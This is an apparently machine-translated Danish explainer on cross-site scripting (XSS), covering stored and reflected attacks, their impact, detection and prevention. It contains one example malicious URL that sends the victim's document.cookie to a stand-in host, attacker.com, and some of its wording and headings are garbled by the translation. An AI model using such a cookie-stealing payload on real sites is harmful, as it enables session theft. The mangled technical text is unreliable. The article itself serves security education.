✅ Hvad er scripting på tværs af websteder? - Sådan fungerer det

Introduktion til cross site scripting

Introduktion til cross site scripting

Med det stigende antal webapplikationer på Internettet er websikkerhed nu blevet et vigtigt problem. Hacking og stjæling af private data fra brugere er nu almindeligt, og det truer dem med at bruge ethvert program. Cross Site Scripting er et af de populære angreb på brugernes websikkerhed. Lad os få et indblik i, hvad scripting på tværs af sider er.
Cross Site Scripting kaldet XSS, er en computersikkerhedsmæssig sårbarhed, hvor angriberen har til formål at tilføje en del ondsindet kode i form af scripts til et betroet websted / webside. Det er et kodeinjektionsangreb på klientsiden, og det ondsindede script udføres i brugerens webbrowser, når han får adgang til dette websted / webside. Indirekte dette websted bliver et medium til at sende den ondsindede kode til brugeren. Ved at injicere scripts angribere omgå DOM (Document Object Model) af sikkerhedsbegrænsninger og få adgang til brugerens følsomme sideindhold, session cookies, browserhistorik for det meste af de private data, som vedligeholdes af browseren.
Websted, der indeholder fora, opslagstavler, websider, der tillader kommentarer og dem, der bruger usaniteret brugerinput og output, der er genereret, er mest sårbare over for XSS-angreb. Selvom XSS-angrebene er mulige i VBScript, ActiveX og CSS, er de mest almindelige i Javascript som det er et grundlæggende element for de fleste browsingoplevelser.

Forskellige typer crosssite scripting (XSS)

Selvom der ikke findes nogen særlig klassificering af Cross Site Scripting, har nogle eksperter klassificeret det i to typer, der diskuteres nedenfor i detaljer:

Gemte XSS-angreb :

Gemt XSS er dem, hvor det ondsindede script, der er injiceret af angriberen, gemmes i databasen og kører i brugerens browser, når han prøver at få adgang til databasen i en eller anden form. Disse er også kendt som vedvarende eller lagret XSS. Dette er et af de mest ødelæggende angreb og sker især, når webstedet / websiden tillader kommentarer eller tillader indlejring af HTML-indhold.
Angriberen tilføjer javascriptet i kommentaren, der gemmes i databasen, og når brugeren får adgang til den berørte side og henter dataene fra databasen, det ondsindede script kører i sin browser, og den angriber får uautoriseret adgang til brugerens private data.
For eksempel på en e-handelswebsid som Olx, der har en uanitiseret meddelelsesboks til produktbeskrivelse, tilføjer en angriber, der er produktsælger, det ondsindede javascript i det, og det gemmes i webstedets database.
Når køberen åbner produktbeskrivelsen for at se detaljerne om produktet, bliver det nu offeret, da scriptet køres i sin webbrowser, og alle detaljer om brugeren, som browseren tillader, bliver kapret.

Procedure XSS-angreb:

Dette er en af de mest almindelige måder, hvorpå en hacker kan forårsage et XSS-angreb på brugeren. Grundlæggende, i procedure XSS-angreb, er angriberen målrettet offeret ved at sende en e-mail, et ondsindet link eller vedhæfte en streng i søgeresultatet, der peger på et betroet websted, men indeholder den ondsindede javascript-kode.
Hvis et offer klikker på den URL, starter det HTTP-anmodningen, og det sender en anmodning til den sårbare webapplikation. Anmodningen vender derefter tilbage til offeret med et svar af indlejret javascript-kode, som webbrowseren udfører i betragtning af, at det kommer fra et betroet websted, resulterer i kapring af browsers fortrolige data.
For eksempel findes der på et e-handelswebsted et søgefelt, hvor en bruger kan søge i emnerne, og den streng, der er skrevet i søgefeltet, er synlig i webstedets URL, når søgeanmodningen sendes til serveren.
Angriberen opretter et link, hvor det ondsindede script samles i URL'en og sendes det til offeret via e-mail. Når offeret åbner dette link, sendes anmodningen til den ondsindede hjemmeside for angriberen, og alle browserdata fra offeret kapres og sendes til angriberen's system.

Hvordan Cross Site Scripting (XSS) fungerer?

I XSS-sårbarhed på tværs af steder er hackerens hovedmotiv at stjæle brugerens data ved at køre det ondsindede script i sin browser, der injiceres i webstedsindholdet, som brugeren bruger på forskellige måder.
Når en bruger f.eks. Søger efter noget tekst på et websted, sendes anmodningen til serveren i formularen:

https://www.abcwebsite.com/search?q=text1

I søgeresultatet returnerer webstedet resultatet sammen med, hvad brugeren søgte efter:

Du søgte efter: tekst1

Hvis søgefunktionen er sårbar over for XSS, kan angriberen tilføje det ondsindede script i URL'en:

https://www.abcwebsite.com/search= dokumentplacering = https: //attacker.com/log.php? c = '+ kodeURIComponent (document.cookie)

Når offeret klikker på dette link, omdirigeres det til det ondsindede websted, dvs. https://attacker.com, og alle browserdata sendes direkte til angriberens computer, hvilket resulterer i, at angriberen stjæler al session-token / cookies.
På denne måde indsprøjter en angriber sit ondsindede script i URL'en, Attacker kan også gemme det script på serveren, der kommer under Stored XSS.

Effekten af sårbarheder på tværs af scripting:

Effekten af scripting på tværs af websider varierer meget. Efter at have udnyttet XSS-sårbarheden får en angriber fuld kontrol over offerets browser og kan udføre forskellige handlinger, der varierer fra små, såsom at se browserhistorikken til katastrofale, som at indsætte orme i computeren.

Nogle af de handlinger, som angriberen kan udføre ved at udnytte XSS-sårbarheden, er som følger: -

Lækning af følsomme oplysninger som brugernavn og adgangskode.
Indsættelse af orme på computeren.
Omdirigerer brugeren til et farligt websted og tvinger til at udføre nogle handlinger
Få adgang til offerets browserhistorie.
Installation af Trojan hesteprogram.
Tving brugeren til at udføre og ændre værdierne i applikationen ved at få adgang over

Find sårbarheder på tværs af scripting:

XSS-sårbarheder opstår af to grunde, enten er input fra brugeren ikke valideret, før det sendes til serveren, eller output, der er modtaget til browseren, er ikke HTML-kodet. Husk den katastrofale virkning af XSS-sårbarhed og beskyttelse af brugernes privatliv, er det meget vigtigt at finde ud af, om webapplikationen er sårbar overfor XSS eller ikke.
Selvom XSS er svært at identificere og fjerne, er den bedste måde at kontrollere at udføre sikkerhedsgennemgangen af koden og kontrollere for alle de steder, hvor input fra HTTP-anmodningen kan gøre det muligt at vise det som output i en applikation. Brug af automatiske sårbarhedsscannerværktøjer, der inkluderer specialiseret XSS-scannermodul til at scanne hele webapplikationen, kan også hjælpe med at scanne og finde sårbarhederne i et program.

H ow for at forhindre XSS?

XSS er en sårbarhed med kodeindsprøjtning, så det er meget vigtigt at kode de data, der sendes til serveren, og de data, der kommer fra serveren til en brugers browser.
Datavalidering er også meget vigtig, så browseren fortolker koden uden ondsindede kommandoer. Der blev indført forskellige forebyggelsesmetoder, idet dataene Validering og kodning blev prioriteret for, at et websted er sårbart over for XSS.

Nogle punkter skal fokuseres for at forhindre XSS: -

HTTP-sporingssupport på alle webservere skal være slået fra, da angriberen kan stjæle cookie og private browserdata gennem et HTTP-sporopkald fra serveren, selvom document.cookie er deaktiveret i offerets browser.
Udviklere skal desinficere inputen og bør aldrig udsende dataene direkte modtaget fra brugeren uden at validere dem.
Links bør generelt afvises, hvis de ikke begynder med de hvidlistede protokoller, såsom HTTP: //, https: // og dermed forhindrer brugen af URI-skemaer som javascript: //

Konklusion:

XSS-angreb er farlige og kan skade brugerens privatliv og stjæle dataene, medmindre den normale bruger gennemsøger applikationen nøje. Så udviklere, mens de udvikler applikationen, skal følge de strenge sikkerhedsregler, især for både data og server, så applikationen er mindst sårbar over for XSS, og flere brugere kan stole på det.

Anbefalede artikler

Dette har været en guide til Hvad er Cross Site Scripting ?. Her diskuterer vi de forskellige typer krydsningssteder, arbejde, påvirkning og forebyggelse af henholdsvis XSS. Du kan også gennemgå vores andre foreslåede artikler for at lære mere -

Sådan fungerer JavaScript
Hvad er et phishing-angreb?
Hvad er et Cyber Attack?
HTTP-cache
Hvordan fungerer cookies i JavaScript med eksempel?

Kategori:

Softwareudvikling

Hvad er scripting på tværs af websteder? - Sådan fungerer det - Effekt og typer af tværsidevis

Introduktion til cross site scripting

Forskellige typer crosssite scripting (XSS)

Gemte XSS-angreb :

Procedure XSS-angreb:

Hvordan Cross Site Scripting (XSS) fungerer?

Effekten af sårbarheder på tværs af scripting:

Find sårbarheder på tværs af scripting:

H ow for at forhindre XSS?

Konklusion:

Anbefalede artikler

Konvertering i Java - Konverteringstyper i Java med eksempler

Konvolutional neurale netværk - Top 10 lag i CNN

Cookie i PHP - Sådan administreres, oprettes og slettes cookies i PHP

Kontinuerlige integrationsværktøjer - 7 Bedste værktøj til kontinuerlig integration

Fordele ved NoSQL - Top 14 fordele ved NoSQL

Fordele ved MongoDB - Omfattende guide til brug af MongoDB

Fordele ved OOP - Udforsk de 9 bedste fordele ved OOP

Avanceret filter i Excel (eksempler) - Sådan bruges avanceret filter i Excel

Hvad er switch? - Top 3 typer switches til forretningsnetværk

Hvad er SVN? - Sådan fungerer det - Arkitektur og karriere - Fordele ved SVN

Hvad er Swift? - Sådan fungerer det - Færdigheder og karrierevækst - Fordele

Hvad er Tableau instrumentbræt? - Formål til oprettelse af instrumentbord på Tableau

Introduktion til cross site scripting

Forskellige typer crosssite scripting (XSS)

Gemte XSS-angreb :

Procedure XSS-angreb:

Hvordan Cross Site Scripting (XSS) fungerer?

Effekten af ​​sårbarheder på tværs af scripting:

Find sårbarheder på tværs af scripting:

H ow for at forhindre XSS?

Konklusion:

Anbefalede artikler

Læs Mere

Effekten af sårbarheder på tværs af scripting: